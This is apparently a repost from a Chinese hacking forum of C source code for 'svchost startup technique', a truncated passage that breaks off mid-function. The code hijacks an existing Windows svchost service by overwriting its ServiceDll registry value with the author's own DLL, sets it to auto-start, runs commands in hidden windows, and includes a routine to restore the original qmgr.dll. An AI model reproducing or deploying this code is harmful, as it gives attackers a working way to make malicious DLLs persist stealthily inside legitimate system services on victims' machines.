SVCHOST启动技术

信息来源：邪恶八进制文章作者：dream2fly.net

//说明：大部门代码来自bingle的文章，感谢bingle，并加入装载自启动代码
//感谢使用，幻影光临白帽子实验室http://www.dream2fly.net/forum
Code Language : C

2.
//Service HANDLE & STATUS used to get service state
3.
SERVICE_STATUS_HANDLE hSrv;
4.
DWORD dwCurrState;
5.

6.
//report service stat to the service control manager
7.
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
8.

9.
//RealService just create a process dream2fly.net
10.
int ControlService(DWORD dwCommand)
11.
{
12.
char cmd[MAX_PATH] = {0};
13.
if (dwCommand == SERVICE_CONTROL_CONTINUE)
14.
{
15.
strcpy(cmd, "net start ");
16.
}
17.
else if(dwCommand == SERVICE_CONTROL_STOP)
18.
{
19.
strcpy(cmd, "net stop ");
20.
}
21.
strcat(cmd, stServiceCfg.szSvcName);
22.

23.
PROCESS_INFORMATION pi;
24.
STARTUPINFO si;
25.
memset(&si,0,sizeof(si));
26.
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
27.
si.wShowWindow=SW_HIDE;
28.
if(!CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
29.
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
30.
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);
31.

32.
return 0;
33.
}
34.

35.
int ReplaceService()
36.
{
37.
int rc = 0;
38.
HKEY hKey = 0;
39.

40.
try{
41.
char buff[500];
42.

43.
//query svchost setting
44.
char *ptr, *pSvchost = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost";
45.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
46.
if(ERROR_SUCCESS != rc)
47.
{
48.
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
49.
throw "";
50.
}
51.

52.
DWORD type, size = sizeof buff;
53.
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
54.
RegCloseKey(hKey);
55.
SetLastError(rc);
56.
if(ERROR_SUCCESS != rc)
57.
throw "RegQueryValueEx(Svchost\netsvcs)";
58.

59.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
60.
if(stricmp(ptr, stServiceCfg.szSvcName) == 0) break;
61.

62.
if(*ptr == 0)
63.
{
64.
OutputString("you specify service name not in Svchost\netsvcs, must be one of following:");
65.
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
66.
OutputString(" - %s", ptr);
67.
throw "";
68.
}
69.

70.
//config service
71.
strncpy(buff, "SYSTEM\CurrentControlSet\Services\", sizeof buff);
72.
strcat(buff, stServiceCfg.szSvcName);
73.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
74.
if(ERROR_SUCCESS != rc)
75.
{
76.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
77.
throw "";
78.
}
79.

80.
DWORD dwValue = 2;//auto start
81.
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
82.
SetLastError(rc);
83.
if(ERROR_SUCCESS != rc)
84.
throw "RegSetValueEx(start)";
85.

86.
////////////////////
87.
char szDllPath[MAX_PATH] = {0};
88.
if(!GetModuleFileName(HMODULE(hDll), szDllPath, sizeof szDllPath))
89.
throw "GetModuleFileName() get dll path";
90.

91.
LogToFile(szDllPath, GetLastError());
92.

93.
strcat(buff, "\Parameters");
94.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
95.
if(ERROR_SUCCESS != rc)
96.
{
97.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
98.
throw "";
99.
}
100.
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
101.
SetLastError(rc);
102.
if(ERROR_SUCCESS != rc)
103.
throw "RegSetValueEx(ServiceDll)";
104.

105.

106.
OutputString("Config service %s ok.", stServiceCfg.szSvcName);
107.
}
108.
catch(char *str)
109.
{
110.
if(str && str[0])
111.
{
112.
rc = GetLastError();
113.
OutputString("%s error %d", str, rc);
114.
}
115.
}
116.

117.
RegCloseKey(hKey);
118.

119.
//启动服务
120.
ControlService(SERVICE_CONTROL_CONTINUE);
121.

122.
return 0;
123.
}
124.

125.
int RecoverService()
126.
{
127.
int rc = 0;
128.
HKEY hKey = 0;
129.

130.
try{
131.
LogToFile("RecoverService");
132.
char buff[500];
133.

134.
//config service
135.
strncpy(buff, "SYSTEM\CurrentControlSet\Services\", sizeof buff);
136.
strcat(buff, stServiceCfg.szSvcName);
137.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
138.
if(ERROR_SUCCESS != rc)
139.
{
140.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
141.
throw "";
142.
}
143.

144.
LogToFile("RegSetValueEx");
145.
DWORD dwValue = 3;//manule start
146.
rc = RegSetValueEx(hKey, "Start", 0, REG_DWORD, (unsigned char*)&dwValue, sizeof(DWORD));
147.
SetLastError(rc);
148.
if(ERROR_SUCCESS != rc)
149.
throw "RegSetValueEx(start)";
150.

151.
////////////////////
152.
char szDllPath[MAX_PATH] = {0};
153.
strcpy(szDllPath, "%SystemRoot%\System32\qmgr.dll");
154.

155.
strcat(buff, "\Parameters");
156.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, buff, 0, KEY_ALL_ACCESS, &hKey);
157.
if(ERROR_SUCCESS != rc)
158.
{
159.
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", stServiceCfg.szSvcName, rc);
160.
throw "";
161.
}
162.
rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)szDllPath, strlen(szDllPath)+1);
163.
SetLastError(rc);
164.
if(ERROR_SUCCESS != rc)
165.
throw "RegSetValueEx(ServiceDll)";
166.

167.

168.
OutputString("RecoverService(%s) SUCCESS.", stServiceCfg.szSvcName);
169.
}
170.
catch(char *str)
171.
{
172.
if(str && str[0])
173.
{
174.
LogToFile(str);
175.
rc = GetLastError();
176.
OutputString("%s error %d", str, rc);
177.
}
178.
}
179.

180.
RegCloseKey(hKey);
181.

182.
//说明：大部门代码来自bingle的文章，感谢bingle，并加入装载自启动代码
183.
//感谢使用，幻影光临白帽子实验室http://www.dream2fly.net/forum
184.

185.
ControlService(SERVICE_CONTROL_STOP);
186.
return 0;
187.
}
188.

189.
BOOL InstallService()
190.
{
191.
// Open a handle to the SC Manager database.
192.
int rc = 0;
193.
HKEY hKey, hkParam = 0;
194.
SC_HANDLE hscm = NULL, schService = NULL;
195.

196.
try{
197.
char buff[500];
198.

199.
//query svchost setting
200.
char *ptr, *pSvchost = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost";
201.
rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pSvchost, 0, KEY_QUERY_VALUE, &hKey);
202.
if(ERROR_SUCCESS != rc)
203.
{
204.
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
205.
throw "";
206.
}
207.

208.
DWORD type, size = sizeof buff;
209.
rc = RegQueryValueEx(hKey, "netsvcs", 0, &type, (unsigned char*)buff, &size);
210.
Reg

补充：软件开发 , Vc ,